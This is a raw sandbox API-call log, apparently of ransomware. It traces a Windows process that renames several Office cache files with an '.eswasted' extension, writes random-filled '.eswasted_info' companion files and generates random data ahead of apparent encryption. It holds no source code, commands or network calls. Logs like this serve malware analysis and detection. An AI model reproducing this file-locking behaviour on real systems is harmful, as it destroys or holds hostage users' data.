[0071.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x715040 [0071.167] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.168] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x715040 | out: pbBuffer=0x715040) returned 1 [0071.168] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.168] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.168] WriteFile (in: hFile=0x11c, lpBuffer=0x715040*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x715040*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.169] SetEndOfFile (hFile=0x11c) returned 1 [0071.172] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715040 | out: hHeap=0x6d0000) returned 1 [0071.172] lstrcpyW (in: lpString1=0x70b6da, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.eswasted")) returned 1 [0071.175] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.175] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0071.176] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x5b1 [0071.176] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b1) returned 0x330000 [0071.176] CloseHandle (hObject=0x128) returned 1 [0071.182] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.183] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.183] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.183] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.183] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.183] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.193] SetEndOfFile (hFile=0x11c) returned 1 [0071.196] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312558 | out: hHeap=0x6d0000) returned 1 [0071.196] CloseHandle (hObject=0x11c) returned 1 [0071.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0071.198] _aulldvrm () returned 0x0 [0071.198] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.198] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.199] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.199] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0071.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b4) returned 0x70b630 [0071.199] lstrcpyW (in: lpString1=0x70b6da, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312148 [0071.199] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.199] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312148 | out: pbBuffer=0x1312148) returned 1 [0071.199] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.200] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.200] WriteFile (in: hFile=0x11c, lpBuffer=0x1312148*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312148*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.201] SetEndOfFile (hFile=0x11c) returned 1 [0071.201] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312148 | out: hHeap=0x6d0000) returned 1 [0071.201] lstrcpyW (in: lpString1=0x70b6da, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.eswasted")) returned 1 [0071.205] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.206] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0071.206] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x5b2 [0071.206] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b2) returned 0x330000 [0071.206] CloseHandle (hObject=0x130) returned 1 [0071.209] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.210] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.210] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.210] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.211] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.211] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.222] SetEndOfFile (hFile=0x11c) returned 1 [0071.225] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715040 | out: hHeap=0x6d0000) returned 1 [0071.225] CloseHandle (hObject=0x11c) returned 1 [0071.226] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.226] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c3b8 | out: hHeap=0x6d0000) returned 1 [0071.226] _aulldvrm () returned 0x0 [0071.226] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.227] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.227] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.227] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0071.227] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x70b630 [0071.227] lstrcpyW (in: lpString1=0x70b6ce, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.227] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.227] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.228] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.228] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.228] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.229] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.229] SetEndOfFile (hFile=0x11c) returned 1 [0071.230] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.230] lstrcpyW (in: lpString1=0x70b6ce, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.eswasted")) returned 1 [0071.230] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.231] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0071.231] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x32b [0071.231] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b) returned 0x330000 [0071.231] CloseHandle (hObject=0x128) returned 1 [0071.233] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.234] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.234] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.234] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.235] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.235] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.243] SetEndOfFile (hFile=0x11c) returned 1 [0071.245] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715040 | out: hHeap=0x6d0000) returned 1 [0071.245] CloseHandle (hObject=0x11c) returned 1 [0071.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c4c0 | out: hHeap=0x6d0000) returned 1 [0071.247] _aulldvrm () returned 0x0 [0071.247] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.248] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.248] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.248] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b630 [0071.248] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.248] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.248] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.249] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.249] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.249] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.250] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.251] SetEndOfFile (hFile=0x11c) returned 1 [0071.251] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.251] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.252] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.252] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.252] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x16fc [0071.252] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc) returned 0x330000 [0071.252] CloseHandle (hObject=0x124) returned 1 [0071.256] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.257] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.257] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.257] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.257] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.257] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.266] SetEndOfFile (hFile=0x11c) returned 1 [0071.268] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715040 | out: hHeap=0x6d0000) returned 1 [0071.268] CloseHandle (hObject=0x11c) returned 1 [0071.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.270] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.270] _aulldvrm () returned 0x0 [0071.270] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.270] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.270] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.271] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0071.271] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ae) returned 0x70b630 [0071.271] lstrcpyW (in: lpString1=0x70b6d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.271] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.271] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.271] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.271] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.272] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.273] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.274] SetEndOfFile (hFile=0x11c) returned 1 [0071.274] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.274] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312240 | out: hHeap=0x6d0000) returned 1 [0071.274] lstrcpyW (in: lpString1=0x70b6d4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.eswasted")) returned 1 [0071.274] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.275] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0071.275] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x567 [0071.275] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x567) returned 0x330000 [0071.275] CloseHandle (hObject=0x128) returned 1 [0071.282] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.284] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.284] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.284] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.285] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.285] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.293] SetEndOfFile (hFile=0x11c) returned 1 [0071.295] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.295] CloseHandle (hObject=0x11c) returned 1 [0071.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.299] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ba90 | out: hHeap=0x6d0000) returned 1 [0071.299] _aulldvrm () returned 0x0 [0071.300] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.300] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.300] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.300] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.300] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b630 [0071.301] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.301] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312240 [0071.301] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.301] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312240 | out: pbBuffer=0x1312240) returned 1 [0071.301] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.301] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.302] WriteFile (in: hFile=0x11c, lpBuffer=0x1312240*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312240*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.303] SetEndOfFile (hFile=0x11c) returned 1 [0071.303] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 